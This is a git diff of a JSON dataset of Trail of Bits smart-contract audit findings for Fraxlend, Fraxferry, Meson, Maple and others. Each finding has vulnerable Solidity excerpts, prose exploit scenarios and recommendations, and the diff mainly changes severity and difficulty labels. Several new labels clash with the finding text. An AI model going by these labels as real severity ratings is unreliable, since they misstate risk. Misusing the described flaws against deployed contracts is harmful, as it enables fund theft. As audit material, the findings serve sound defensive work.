cast in spool-v2-core/DepositManager.sol#L220 function syncDeposits( address smartVault, uint256 [3] calldata bag, // uint256 flushIndex, // uint256 lastDhwSyncedTimestamp, // uint256 oldTotalSVTs, address [] calldata strategies, uint16a16[2] calldata dhwIndexes, address [] calldata assetGroup, SmartVaultFees calldata fees ) external returns (DepositSyncResult memory ) { [...] if (syncResult.mintedSVTs > 0) { _flushShares[smartVault][bag[0]].mintedVaultShares = uint128 (syncResult.mintedSVTs) ; [...] } return syncResult; } Figure 38.2: A possible unsafe cast in spool-v2-core/DepositManager.sol#L243 Recommendations Short term, review the codebase to identify all of the casts that may be unsafe. Analyze whether these casts could be a problem in the current codebase and, if they are unsafe, make the necessary changes to make them safe. Long term, when implementing potentially unsafe casts, always include comments to explain why those casts are safe in the context of the codebase.", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: Medium" + "Severity: Undetermined", + "Difficulty: Undetermined" ] }, { @@ -4968,7 +7616,7 @@ "labels": [ "Trail of Bits", "Severity: Medium", - "Difficulty: Low" + "Difficulty: High" ] }, { @@ -4987,17 +7635,7 @@ "body": "A Fraxlend pair can have a maturity date, after which a penalty rate is applied to the interest to be paid by the borrowers. However, the penalty rate is also applied to the amount of time immediately before the maturity date. As shown in gure 3.1, the _addInterest function checks whether a pair is past maturity. If it is, the function sets the new rate (the _newRate parameter) to the penalty rate (the penaltyRate parameter) and then uses it to calculate the matured interest. The function should apply the penalty rate only to the time between the maturity date and the current time; however, it also applies the penalty rate to the time between the last interest accrual ( _deltaTime ) and the maturity date, which should be subject only to the normal interest rate. function _addInterest () // [...] uint256 _deltaTime = block.timestamp - _currentRateInfo.lastTimestamp; // [...] if (_isPastMaturity()) { _newRate = uint64 (penaltyRate); } else { // [...] // Effects: bookkeeping _currentRateInfo.ratePerSec = _newRate; _currentRateInfo.lastTimestamp = uint64 ( block.timestamp ); _currentRateInfo.lastBlock = uint64 ( block.number ); // Calculate interest accrued _interestEarned = (_deltaTime * _totalBorrow.amount * _currentRateInfo.ratePerSec) / 1e18; Figure 3.1: The _addInterest function in FraxlendPairCore.sol#L406-L494 Exploit Scenario A Fraxlend pairs maturity date is 100, the delta time (the last time interest accrued) is 90, and the current time is 105. Alice decides to repay her debt. The _addInterest function is executed, and the penalty rate is also applied to the interest accrual and the maturity date. As a result, Alice owes more in interest than she should. Recommendations Short term, modify the associated code so that if the _isPastMaturity branch is taken and the _currentRateInfo.lastTimestamp value is less than maturityDate value, the penalty interest rate is applied only for the amount of time after the maturity date. Long term, identify edge cases that could occur in the interest accrual process and implement unit tests and fuzz tests to validate them.", "labels": [ "Trail of Bits", - "Severity: Low", - "Difficulty: High" - ] - }, - { - "title": "7. Contracts used as dependencies do not track upstream changes ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf", - "body": "The LooksRare codebase uses a third-party contract, SignatureChecker , but the LooksRare documentation does not specify which version of the contract is used or whether it was modied. This indicates that the LooksRare protocol does not track upstream changes in contracts used as dependencies. Therefore, the LooksRare contracts may not reliably reect updates or security xes implemented in their dependencies, as those updates must be manually integrated into the contracts. Exploit Scenario A third-party contract used in LooksRare receives an update with a critical x for a vulnerability, but the update is not manually integrated in the LooksRare version of the contract. An attacker detects the use of a vulnerable contract in the LooksRare protocol and exploits the vulnerability against one of the contracts. Recommendations Short term, review the codebase and document the source and version of each dependency. Include third-party sources as submodules in the projects Git repository to maintain internal path consistency and ensure that dependencies are updated periodically. Long term, use an Ethereum development environment and NPM to manage packages in the project.", - "labels": [ - "Trail of Bits", - "Severity: Low", + "Severity: Medium", "Difficulty: Low" ] }, @@ -5008,7 +7646,7 @@ "labels": [ "Trail of Bits", "Severity: Low", - "Difficulty: Low" + "Difficulty: Medium" ] }, { @@ -5027,7 +7665,7 @@ "body": "A Fraxlend custom pair can include a list of approved lenders; these are the only lenders who can deposit the underlying asset into the given pair and receive the corresponding fTokens. However, the system does not perform checks when users transfer fTokens; as a result, approved lenders could send fTokens to unapproved addresses. Although unapproved addresses can only redeem fTokens sent to themmeaning this issue is not security-criticalthe ability for approved lenders to send fTokens to unapproved addresses conicts with the currently documented behavior. function deposit ( uint256 _amount , address _receiver ) external nonReentrant isNotPastMaturity whenNotPaused approvedLender(_receiver) returns ( uint256 _sharesReceived ) {...} Figure 6.1: The deposit function in FraxlendPairCore.sol#L587-L594 Exploit Scenario Bob, an approved lender, deposits 100 asset tokens and receives 90 fTokens. He then sends the fTokens to an unapproved address, causing other users to worry about the state of the protocol. Recommendations Short term, override the _beforeTokenTransfer function by applying the approvedLender modier to it. Alternatively, document the ability for approved lenders to send fTokens to unapproved addresses. Long term, when applying access controls to token owners, make sure to evaluate all the possible ways in which a token can be transferred and document the expected behavior.", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Low", "Difficulty: Low" ] }, @@ -5037,8 +7675,8 @@ "body": "The FraxlendPairDeployer contract, which is used to deploy new pairs, does not allow contracts that contain less than 13,000 bytes of code to be deployed. To deploy new pairs, users call the deploy or deployCustom function, which then internally calls _deployFirst . This function uses the create2 opcode to create a contract for the pair by concatenating the bytecode stored in contractAddress1 and contractAddress2 . The setCreationCode function, which uses solmates SSTORE2 library to store the bytecode for use by create2 , splits the bytecode into two separate contracts ( contractAddress1 and contractAddress2 ) if the _creationCode size is greater than 13,000. function setCreationCode ( bytes calldata _creationCode) external onlyOwner { bytes memory _firstHalf = BytesLib.slice(_creationCode, 0 , 13000 ); contractAddress1 = SSTORE2.write(_firstHalf); if (_creationCode.length > 13000 ) { bytes memory _secondHalf = BytesLib.slice(_creationCode, 13000 , _creationCode.length - 13000 ); contractAddress2 = SSTORE2.write(_secondHalf); } } Figure 7.1: The setCreationCode function in FraxlendPairDeployer.sol#L173-L180 The rst problem is that if the _creationCode size is less than 13,000, BytesLib.slice will revert with the slice_outOfBounds error, as shown in gure 7.2. function slice ( bytes memory _bytes, uint256 _start , uint256 _length ) internal pure returns ( bytes memory ) { require (_length + 31 >= _length, \"slice_overflow\" ); require (_bytes.length >= _start + _length, \"slice_outOfBounds\" ); Figure 7.2: The BytesLib.slice function from the solidity-bytes-utils library Assuming that the rst problem does not exist, another problem arises from the use of SSTORE2.read in the _deployFirst function (gure 7.3). If the creation code was less than 13,000 bytes, contractAddress2 would be set to address(0) . This would cause the SSTORE2.read functions pointer.code.length - DATA_OFFSET computation, shown in gure 7.4, to underow, causing the SSTORE2.read operation to panic. function _deployFirst ( // [...] ) private returns ( address _pairAddress ) { { // [...] bytes memory _creationCode = BytesLib.concat( SSTORE2.read(contractAddress1), SSTORE2.read(contractAddress2) ); Figure 7.3: The _deployFirst function in FraxlendPairDeployer.sol#L212-L231 uint256 internal constant DATA_OFFSET = 1 ; function read ( address pointer ) internal view returns ( bytes memory ) { return readBytecode(pointer, DATA_OFFSET, pointer.code.length - DATA_OFFSET ); } Figure 7.4: The SSTORE2.read function from the solmate library Exploit Scenario Bob, the FraxlendPairDeployer contracts owner, wants to set the creation code to be a contract with fewer than 13,000 bytes. When he calls setCreationCode , it reverts. Recommendations Short term, make the following changes: In setCreationCode , in the line that sets the _firstHalf variable, replace 13000 in the third argument of BytesLib.slice with min(13000, _creationCode.length) . In _deployFirst , add a check to ensure that the SSTORE2.read(contractAddress2) operation executes only if contractAddress2 is not address(0) . Alternatively, document the fact that it is not possible to deploy contracts with fewer than 13,000 bytes. Long term, improve the projects unit tests and fuzz tests to check that the functions behave as expected and cannot unexpectedly revert.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: Undetermined" + "Severity: Medium", + "Difficulty: Low" ] }, { @@ -5047,8 +7685,8 @@ "body": "The setCreationCode function permits the owner of FraxlendPairDeployer to set the bytecode that will be used to create contracts for newly deployed pairs. If the _creationCode size is greater than 13,000 bytes, it will be split into two separate contracts ( contractAddress1 and contractAddress2 ). However (assuming that TOB-FXLEND-7 were xed), if a FraxlendPairDeployer owner were to change the creation code from one of greater than 13,000 bytes to one of fewer than 13,000 bytes, contractAddress2 would not be reset to address(0) ; therefore, contractAddress2 would still contain the second half of the previous creation code. function setCreationCode ( bytes calldata _creationCode) external onlyOwner { bytes memory _firstHalf = BytesLib.slice(_creationCode, 0 , 13000 ); contractAddress1 = SSTORE2.write(_firstHalf); if (_creationCode.length > 13000 ) { bytes memory _secondHalf = BytesLib.slice(_creationCode, 13000 , _creationCode.length - 13000 ); contractAddress2 = SSTORE2.write(_secondHalf); } } Figure 8.1: The setCreationCode function in FraxlendPairDeployer.sol#L173-L180 Exploit Scenario Bob, FraxlendPairDeployer s owner, changes the creation code from one of more than 13,000 bytes to one of less than 13,000 bytes. As a result, deploy and deployCustom deploy contracts with unexpected bytecode. Recommendations Short term, modify the setCreationCode function so that it sets contractAddress2 to address(0) at the beginning of the function . Long term, improve the projects unit tests and fuzz tests to check that the functions behave as expected and cannot unexpectedly revert.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: High" + "Severity: Undetermined", + "Difficulty: Medium" ] }, { @@ -5057,8 +7695,8 @@ "body": "The setFee and setMinWaitPeriods functions do not have appropriate checks. First, the setFee function does not have an upper limit, which means that the Fraxferry owner can set enormous fees. Second, the setMinWaitPeriods function does not require the new value to be at least one hour. A minimum waiting time of less than one hour would invalidate important safety assumptions. For example, in the event of a reorganization on the source chain, the minimum one-hour waiting time ensures that only transactions after the reorganization are ferried (as described in the code comment in gure 9.1). ** - Reorgs on the source chain. Avoided, by only returning the transactions on the source chain that are at least one hour old. ** - Rollbacks of optimistic rollups. Avoided by running a node. ** - Operators do not have enough time to pause the chain after a fake proposal. Avoided by requiring a minimal amount of time between sending the proposal and executing it. // [...] function setFee ( uint _FEE ) external isOwner { FEE=_FEE; emit SetFee(_FEE); } function setMinWaitPeriods ( uint _MIN_WAIT_PERIOD_ADD , uint _MIN_WAIT_PERIOD_EXECUTE ) external isOwner { MIN_WAIT_PERIOD_ADD=_MIN_WAIT_PERIOD_ADD; MIN_WAIT_PERIOD_EXECUTE=_MIN_WAIT_PERIOD_EXECUTE; emit SetMinWaitPeriods(_MIN_WAIT_PERIOD_ADD, _MIN_WAIT_PERIOD_EXECUTE); } Figure 9.1: The setFee and setMinWaitPeriods functions in Fraxferry.sol#L226-L235 Exploit Scenario Bob, Fraxferry s owner, calls setMinWaitPeriods with a _MIN_WAIT_PERIOD_ADD value lower than 3,600 (one hour) , invalidating the waiting periods protection regarding chain reorganizations. Recommendations Short term, add an upper limit check to the setFee function; add a check to the setMinWaitPeriods function to ensure that _MIN_WAIT_PERIOD_ADD and _MIN_WAIT_PERIOD_EXECUTE are at least 3,600 (one hour). Long term, make sure that conguration variables can be set only to valid values.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: Low" + "Severity: Low", + "Difficulty: High" ] }, { @@ -5067,8 +7705,8 @@ "body": "The depart function performs an unsafe cast operation that could result in an invalid batch. Users who want to send tokens to a certain chain use the various embark* functions. These functions eventually call embarkWithRecipient , which adds the relevant transactions to the transactions array. function embarkWithRecipient ( uint amount , address recipient ) public notPaused { // [...] transactions.push(Transaction(recipient,amountAfterFee, uint32 ( block.timestamp ))); } Figure 10.1: The embarkWithRecipient function in Fraxferry.sol#L127-L135 At a certain point, the captain role calls depart with the start and end indices within transactions to specify the transactions inside of a batch. However, the depart function performs an unsafe cast operation when creating the new batch; because of this unsafe cast operation, an end value greater than 2 ** 64 would be cast to a value lower than the start value, breaking the invariant that end is greater than or equal to start . function depart ( uint start , uint end , bytes32 hash ) external notPaused isCaptain { require ((batches.length== 0 && start== 0 ) || (batches.length> 0 && start==batches[batches.length- 1 ].end+ 1 ), \"Wrong start\" ); require (end>=start, \"Wrong end\" ); batches.push(Batch( uint64 (start), uint64 (end), uint64 ( block.timestamp ), 0 , hash )); emit Depart(batches.length- 1 ,start,end, hash ); } Figure 10.2: The depart function in Fraxferry.sol#L155-L160 If the resulting incorrect batch is not disputed by the crew member roles, which would cause the system to enter a paused state, the rst ocer role will call disembark to actually execute the transactions on the target chain. However, the disembark functions third check, highlighted in gure 10.3, on the invalid transaction will fail, causing the transaction to revert and the system to stop working until the incorrect batch is removed with a call to removeBatches . function disembark (BatchData calldata batchData) external notPaused isFirstOfficer { Batch memory batch = batches[executeIndex++]; require (batch.status== 0 , \"Batch disputed\" ); require (batch.start==batchData.startTransactionNo, \"Wrong start\" ); require (batch.start+batchData.transactions.length- 1 ==batch.end, \"Wrong size\" ); require ( block.timestamp -batch.departureTime>=MIN_WAIT_PERIOD_EXECUTE, \"Too soon\" ); // [...] } Figure 10.3: The disembark function in Fraxferry.sol#L162-L178 Exploit Scenario Bob, Fraxferry s captain, calls depart with an end value greater than 2 ** 64 , which is cast to a value less than start . As a consequence, the system becomes unavailable either because the crew members called disputeBatch or because the disembark function reverts. Recommendations Short term, replace the unsafe cast operation in the depart function with a safe cast operation to ensure that the end >= start invariant holds. Long term, implement robust unit tests and fuzz tests to check that important invariants hold.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: Undetermined" + "Severity: High", + "Difficulty: High" ] }, { @@ -5077,47 +7715,127 @@ "body": "The Fraxferry contracts owner can call the jettison or jettisonGroup functions to cancel a transaction or a series of transactions, respectively. However, these functions incorrectly use the executeIndex variable to determine whether the given transaction has already been executed. As a result, it is possible to cancel an already executed transaction. The problem is that executeIndex tracks executed batches, not executed transactions. Because a batch can contain more than one transaction, the check in the _jettison function (gure 11.1) does not work correctly. function _jettison ( uint index , bool cancel ) internal { require (index>=executeIndex, \"Transaction already executed\" ); cancelled[index]=cancel; emit Cancelled(index,cancel); } function jettison ( uint index , bool cancel ) external isOwner { _jettison(index,cancel); } function jettisonGroup ( uint [] calldata indexes, bool cancel ) external isOwner { for ( uint i = 0 ;i 0, \"Amount must be positive\"); uint40 poolIndex = _poolIndexFrom(poolTokenIndex); require(poolIndex != 0, \"Cannot use 0 as pool index\"); Figure 9.2: contracts/Pools/MesonPools.sol:7074 Moreover, even if the function allowed the withdrawal of tokens stored at poolIndex 0, a withdrawal would still not be possible. This is because the owner of poolIndex 0 is not set during initialization, and it is not possible to register a pool with index 0. 13 14 function initialize(address[] memory supportedTokens) public { require(!_initialized, \"Contract instance has already been initialized\"); 21 Meson Protocol Fix Review _initialized = true; _owner = _msgSender(); _premiumManager = _msgSender(); for (uint8 i = 0; i < supportedTokens.length; i++) { _addSupportToken(supportedTokens[i], i + 1); 15 16 17 18 19 20 21 22 } } Figure 9.3: contracts/UpgradableMeson.sol:1322 Fix Analysis This issue has been resolved. The source code now includes comments explaining that the service fee will not be withdrawable until the contract is updated. 22 Meson Protocol Fix Review", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: High" + "Severity: Informational", + "Difficulty: Low" ] }, { @@ -5197,8 +7915,8 @@ "body": "The MesonHelpers contract uses the low-level call function to execute the transfer / transferFrom function of an ERC20 token. However, it does not rst perform a contract existence check. Thus, if there is no contract at the token address, the low-level call will still return success. This means that if a supported token is subsequently self-destructed (which is unlikely to happen), it will be possible for a posted swap involving that token to succeed without actually depositing any tokens. function _unsafeDepositToken( address token, address sender, uint256 amount, bool isUCT 53 54 55 56 57 58 ) internal { 59 60 61 62 require(token != address(0), \"Token not supported\"); require(amount > 0, \"Amount must be greater than zero\"); (bool success, bytes memory data) = token.call(abi.encodeWithSelector( bytes4(0x23b872dd), // bytes4(keccak256(bytes(\"transferFrom(address,address,uint256)\"))) 63 64 65 66 sender, address(this), amount // isUCT ? amount : amount * 1e12 // need to switch to this line if deploying to BNB Chain or Conflux 67 68 )); require(success && (data.length == 0 || abi.decode(data, (bool))), \"transferFrom failed\"); 69 } Figure 10.1: contracts/util/MesonHelpers.sol:5369 The Solidity documentation includes the following warning: The low-level functions call, delegatecall and staticcall return true as their first 23 Meson Protocol Fix Review return value if the account called is non-existent, as part of the design of the EVM. Account existence must be checked prior to calling if needed. Figure 10.2: A snippet of the Solidity documentation detailing unexpected behavior related to call Fix Analysis This issue has been resolved. The low-level call is now paired with OpenZeppelins Address.isContract function, which ensures that the contract at the target address is populated as expected. This makes the deposit mechanism robust against self-destructs. 24 Meson Protocol Fix Review", "labels": [ "Trail of Bits", - "Severity: Low", - "Difficulty: Medium" + "Severity: High", + "Difficulty: High" ] }, { @@ -5217,8 +7935,8 @@ "body": "The Meson protocol software development kit (SDK) uses the _randomHex function to generate random salts for new swaps. This function accepts a string length as input and produces a random hexadecimal string of that length. To do that, _randomHex uses the JavaScript Math.random function to generate a 32-bit integer and then encodes the integer as a zero-padded hexadecimal string. The result is eight random hexadecimal characters, padded with zeros to the desired length. However, the function is called with an argument of 16, so half of the characters in the salt it produces will be zero. } 95 96 97 98 99 100 101 102 103 104 } 105 106 107 108 109 110 111 112 113 } private _makeFullSalt(salt?: string): string { if (salt) { if (!isHexString(salt) || salt.length > 22) { throw new Error('The given salt is invalid') } return `${salt}${this._randomHex(22 - salt.length)}` return `0x0000${this._randomHex(16)}` private _randomHex(strLength: number) { if (strLength === 0) { return '' } const max = 2 ** Math.min((strLength * 4), 32) const rnd = BigNumber.from(Math.floor(Math.random() * max)) return hexZeroPad(rnd.toHexString(), strLength / 2).replace('0x', '') Figure 12.1: packages/sdk/src/Swap.ts#95113 Furthermore, the Math.random function is not suitable for uses in which the output of the random number generator should be unpredictable. While the protocols current use of the function does not pose a security risk, future implementers and library users may assume that the function produces the requested amount of high-quality entropy. 26 Meson Protocol Fix Review Fix Analysis This issue has been partially resolved. While the _randomHex function now uses cryptographic randomness to generate random hexadecimal characters, the function continues to silently output leading zeros when more than eight characters are requested or when an odd number of characters is requested. To prevent future misuse of this function, we recommend having it return a uniformly random string with the exact number of characters requested. 27 Meson Protocol Fix Review", "labels": [ "Trail of Bits", - "Severity: Undetermined", - "Difficulty: Undetermined" + "Severity: Informational", + "Difficulty: High" ] }, { @@ -5227,8 +7945,8 @@ "body": "The primary identier of swaps in the MesonSwap contract is the encodedSwap structure. This structure does not contain the address of a swaps initiator, which is recorded, along with the poolIndex of the bonded liquidity provider (LP), as the postingValue. If a malicious actor or maximal extractable value (MEV) bot were able to front-run a users transaction and post an identical encodedSwap, the original initiators transaction would fail, and the initiators swap would not be posted. 48 function postSwap(uint256 encodedSwap, bytes32 r, bytes32 s, uint8 v, uint200 postingValue) external forInitialChain(encodedSwap) 49 50 { 51 require(_postedSwaps[encodedSwap] == 0, \"Swap already exists\"); ... Figure 13.1: contracts/Swap/MesonSwap.sol#4852 Because the Meson protocol supports only 1-to-1 stablecoin swaps, transaction front-running is unlikely to be protable. However, a bad actor could dramatically aect a specic users ability to transact within the system. Fix Analysis This issue has not been resolved. Meson acknowledged that user transactions can be blocked from execution by malicious actors. However, blocking a swap transaction would require an adversary to post a corresponding swap, and to thus burn gas and have his or her funds temporarily locked; these disincentives limit the impact of this issue. 28 Meson Protocol Fix Review", "labels": [ "Trail of Bits", - "Severity: Low", - "Difficulty: High" + "Severity: Medium", + "Difficulty: Medium" ] }, { @@ -5247,7 +7965,7 @@ "body": "Insucient input validation in the _addSupportToken function makes it possible to register the same token as supported multiple times. This does not cause a problem, because if there are duplicate entries for a token in the token list, the last one added will be the one that is used. However, it does mean that multiple indexes could point to the same token, while the token would point to only one of those indexes. function _addSupportToken(address token, uint8 index) internal { require(index != 0, \"Cannot use 0 as token index\"); _indexOfToken[token] = index; _tokenList[index] = token; 47 48 49 50 51 } Figure 3.1: contracts/utils/MesonTokens.sol Fix Analysis This issue has been resolved. The _addSupportToken function now validates that the token has not previously been registered, that the associated list index has not previously been used, and that the tokens address is not zero. The Meson team has also added tests to validate this behavior. 15 Meson Protocol Fix Review", "labels": [ "Trail of Bits", - "Severity: High", + "Severity: Informational", "Difficulty: High" ] }, @@ -5257,8 +7975,8 @@ "body": "Several critical operations in the MesonPools contract do not emit events. As a result, it will be dicult to review the correct behavior of the contract once it has been deployed. The following operations should trigger events: MesonPools.depositAndRegister MesonPools.deposit MesonPools.withdraw MesonPools.addAuthorizedAddr MesonPools.removeAuthorizedAddr MesonPools.unlock Without events, users and blockchain-monitoring systems cannot easily detect suspicious behavior and may therefore overlook attacks or malfunctioning contracts. Fix Analysis This issue has been resolved. All of the functions listed in this nding now emit events, enabling Meson and protocol users to easily track all contract operations. 16 Meson Protocol Fix Review", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: High" + "Severity: Informational", + "Difficulty: Low" ] }, { @@ -5277,7 +7995,7 @@ "body": "For the MapleLoan contracts fundLoan method to fund a new loan, the balance of fundsAsset in the contract must be equal to the requested principal. // Amount funded and principal are as requested. amount_ = _principal = _principalRequested; // Cannot under/over fund loan, so that accounting works in context of PoolV1 require (_getUnaccountedAmount(_fundsAsset) == amount_, \"MLI:FL:WRONG_FUND_AMOUNT\" ); Figure 1.1: An excerpt of the fundLoan function ( contracts/MapleLoanInternals.sol#240244 ) An attacker could prevent a lender from funding a loan by making a small transfer of fundsAsset every time the lender tried to fund it (front-running the transaction). However, transaction fees would make the attack expensive. A similar issue exists in the Refinancer contract: If the terms of a loan were changed to increase the borrowed amount, an attacker could prevent a lender from accepting the new terms by making a small transfer of fundsAsset . The underlying call to increasePrincipal from within the acceptNewTerms function would then cause the transaction to revert. function increasePrincipal ( uint256 amount_ ) external override { require (_getUnaccountedAmount(_fundsAsset) == amount_, \"R:IP:WRONG_AMOUNT\" ); _principal += amount_; _principalRequested += amount_; _drawableFunds += amount_; emit PrincipalIncreased(amount_); 13 Maple Labs } Figure 1.2: The vulnerable method in the Refinancer contract ( contracts/Refinancer.sol#2330 ) Exploit Scenario A borrower tries to quickly increase the principal of a loan to take advantage of a short-term high-revenue opportunity. The borrower proposes new terms, and the lender tries to accept them. However, an attacker blocks the process and performs the protable operation himself. Recommendations Short term, allow the lender to withdraw funds in excess of the expected value (by calling getUnaccountedAmount(fundsAsset) ) before a loan is funded and between the proposal and acceptance of new terms. Alternatively, have fundLoan and increasePrincipal use greater-than-or-equal-to comparisons, rather than strict equality comparisons, to check whether enough tokens have been transferred to the contract; if there are excess tokens, use the same function to transfer them to the lender. Long term, avoid using exact comparisons for ether and token balances, as users can increase those balances by executing transfers, making the comparisons evaluate to false . 14 Maple Labs", "labels": [ "Trail of Bits", - "Severity: High", + "Severity: Low", "Difficulty: High" ] }, @@ -5298,7 +8016,7 @@ "labels": [ "Trail of Bits", "Severity: Low", - "Difficulty: High" + "Difficulty: Medium" ] }, { @@ -5307,7 +8025,7 @@ "body": "IERC20Like.decimal s declares uint256 as its return type, whereas the ERC20 standard species that it must return a uint8 . As a result, functions that use the IERC20Like interface interpret the values returned by decimals as uint256 values; this can cause values greater than 255 to enter the protocol, which could lead to undened behavior. If the return type were uint8 , only the last byte of the return value would be used. Exploit Scenario A non-standard token with a decimals function that returns values greater than 255 is integrated into the protocol. The code is not prepared to handle decimals values greater than 255. As a result of the large value, the arithmetic becomes unstable, enabling an attacker to drain funds from the protocol. Recommendations Short term, change the return type of IERC20.decimals to uint8 . Long term, ensure that all interactions with ERC20 tokens follow the standard. 18 Maple Labs", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Undetermined", "Difficulty: High" ] }, @@ -5317,7 +8035,7 @@ "body": "Calls to ERC20Helper.transfer in the codebase are wrapped in require statements, except for the rst such call in the liquidatePortion function of the Liquidator contract (gure 5.1). As such, a token transfer executed through this call can fail silently, meaning that liquidatePortion can take a user's funds without providing any collateral in return. This contravenes the expected behavior of the function and the behavior outlined in the docstring of ILiquidator.liquidatePortion (gure 5.2). function liquidatePortion ( uint256 swapAmount_ , bytes calldata data_) external override { ERC20Helper.transfer (collateralAsset, msg.sender , swapAmount_); msg.sender .call(data_); uint256 returnAmount = getExpectedAmount(swapAmount_); require (ERC20Helper.transferFrom(fundsAsset, msg.sender , destination, returnAmount), \"LIQ:LP:TRANSFER_FROM\" ); emit PortionLiquidated(swapAmount_, returnAmount); } Figure 5.1: The liquidatePortion function ( contracts/Liquidator.sol#4151 ) * @dev Flash loan function that : * @dev 1 . Transfers a specified amount of `collateralAsset` to ` msg.sender `. * @dev 2 . Performs an arbitrary call to ` msg.sender `, to trigger logic necessary to get `fundsAsset` (e.g., AMM swap). * @dev 3 . Perfroms a `transferFrom`, taking the corresponding amount of `fundsAsset` from the user. * @dev If the required amount of `fundsAsset` is not returned in step 3 , the entire transaction reverts. * @param swapAmount_ Amount of `collateralAsset` that is to be borrowed in the flashloan. * @param data_ 2 . ABI-encoded arguments to be used in the low-level call to perform step 19 Maple Labs */ Figure 5.2: Docstring of liquidatePortion ( contracts/interfaces/ILiquidator.sol#7683 ) Exploit Scenario A loan is liquidated, and its liquidator contract has a collateral balance of 300 ether. The current ether price is 4,200 USDC. Alice wants to prot o of the liquidation by taking out a ash loan of 300 ether. Having checked that the contract holds enough collateral to cover the transaction, she calls liquidatePortion(1260000, ) in the liquidator contract. At the same time, Bob decides to buy 10 ether from the liquidator contract. Bob calls Liquidator.liquidatePortion(42000) . Because his transaction is mined rst, the liquidator does not have enough collateral to complete the transfer of collateral to Alice. As a result, the liquidator receives a transfer of 1,260,000 USDC from Alice but does not provide any ether in return, leaving her with a $1,260,000 loss. Recommendations Short term, wrap ERC20Helper.transfer in a require statement to ensure that a failed transfer causes the entire transaction to revert. Long term, ensure that a failed transfer of tokens to or from a user always causes the entire transaction to revert. To do that, follow the recommendations outlined in TOB-MAPLE-006 and have the ERC20Helper.transfer and ERC20Helper.transferFrom functions revert on a failure. Ensure that all functions behave as expected , that their behavior remains predictable when transactions are reordered, and that the code does not contain any footguns or surprises. 20 Maple Labs", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Medium", "Difficulty: Low" ] }, @@ -5328,7 +8046,7 @@ "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: High" + "Difficulty: Low" ] }, { @@ -5337,7 +8055,7 @@ "body": "The ERC20Helper contract lls a purpose similar to that of OpenZeppelin's SafeERC20 contract. However, while OpenZeppelin's SafeERC20 transfer and approve functions will revert when called on an address that is not a token contract address (i.e., one with zero-length bytecode), ERC20Helper s functions will appear to silently succeed without transferring or approving any tokens. If the address of an externally owned account (EOA) is used as a token address in the protocol, all transfers to it will appear to succeed without any tokens being transferred. This will result in undened behavior. Contract existence checks are usually performed via the EXTCODESIZE opcode. Since the EXTCODESIZE opcode would precede a CALL to a token address, adding EXTCODESIZE would make the CALL a warm access. As a result, adding the EXTCODESIZE check would increase the gas cost by only a little more than 100. Assuming a high gas price of 200 gwei and a current ether price of $4,200, that equates to an additional cost of 10 cents for each call to the functions of ERC20Helper , which is a low price to pay for increased security. The following functions lack contract existence checks: ERC20Helper call in _call ProxyFactory call in _initializeInstance call in _upgradeInstance (line 66) call in _upgradeInstance (line 72) Proxied delegatecall in _migrate Proxy delegatecall in _ fallback 22 Maple Labs MapleLoanInternals delegatecall in _acceptNewTerms Exploit Scenario A token contract is destroyed. However, since all transfers of the destroyed token will succeed, all Maple protocol users can transact as though they have an unlimited balance of that token. If contract existence checks were executed before those transfers, all transfers of the destroyed token would revert. Recommendations Short term, add a contract existence check before each of the low-level calls mentioned above. Long term, add contract existence checks before all low-level CALL s, DELEGATECALL s, and STATICCALL s. These checks are inexpensive and add an important layer of defense. 23 Maple Labs", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: High", "Difficulty: High" ] }, @@ -5347,8 +8065,8 @@ "body": "A number of constructors and functions in the codebase do not revert if zero is passed in for a parameter that should not be set to zero. The following parameters are not checked for the zero value: Liquidator contract constructor() owner_ collateralAsset_ fundsAsset_ auctioneer_ destination_ setAuctioneer() auctioneer_ MapleLoan contract setBorrower() borrower_ setLender() lender_ MapleProxyFactory contract constructor() mapleGlobals_ If zero is passed in for one of those parameters, it will render the contract unusable, leaving its funds locked (and therefore eectively lost) and necessitating an expensive redeployment. For example, if there were a bug in the front end, MapleLoan.setBorrower could be called with address(0) , rendering the contract unusable and locking its funds in it. 24 Maple Labs The gas cost of checking a parameter for the zero value is negligible. Since the parameter is usually already on the stack, a zero check consists of a DUP opcode (3 gas) and an ISZERO opcode (3 gas). Given a high gas price of 200 gwei and an ether price of $4,200, a zero check would cost half a cent. Exploit Scenario A new version of the front end is deployed. A borrower suspects that the address currently used for his or her loan might have been compromised. As a precautionary measure, the borrower decides to transfer ownership of the loan to a new address. However, the new version of the front end contains a bug: the value of an uninitialized variable is used to construct the transaction. As a result, the borrower loses access to the loan contract, and to the collateral, forever. If zero checks had been in place, the transaction would have reverted instead. Recommendations Short term, add zero checks for the parameters mentioned above and for all other parameters for which zero is not an acceptable value. Long term, comprehensively validate all parameters. Avoid relying solely on the validation performed by front-end code, scripts, or other contracts, as a bug in any of those components could prevent it from performing that validation. Additionally, integrate Slither into the CI pipeline to automatically detect functions that lack zero checks. 25 Maple Labs", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: High" + "Severity: Medium", + "Difficulty: Medium" ] }, { @@ -5357,8 +8075,18 @@ "body": "The liquidatePortion function of the Liquidator contract computes the amount of funds that will be transferred from the caller to the liquidator contract. The computation uses an asset price retrieved from an oracle. There is no guarantee that the amount paid by the caller will correspond to the current market price, as a transaction that updates the price feed could be mined before the call to liquidatePortion in the liquidator contract. EOAs that call the function cannot predict the return value of the oracle. If the caller is a contract, though, it can check the return value, with some eort. Adding an upper limit to the amount paid by the caller would enable the caller to explicitly state his or her assumptions about the execution of the contract and to avoid paying too much. It would also provide additional protection against the misreporting of oracle prices. Since such a scenario is unlikely, we set the diculty level of this nding to high. Using caller-controlled limits for the amount of a transfer is a best practice commonly employed by large DeFi protocols such as Uniswap. Exploit Scenario Alice calls liquidatePortion in the liquidator contract. Due to an oracle malfunction, the amount of her transfer to the liquidator contract is much higher than the amount she would pay for the collateral on another market. Recommendations Short term, introduce a maxReturnAmount parameter and add a require statement require(returnAmount <= maxReturnAmount) 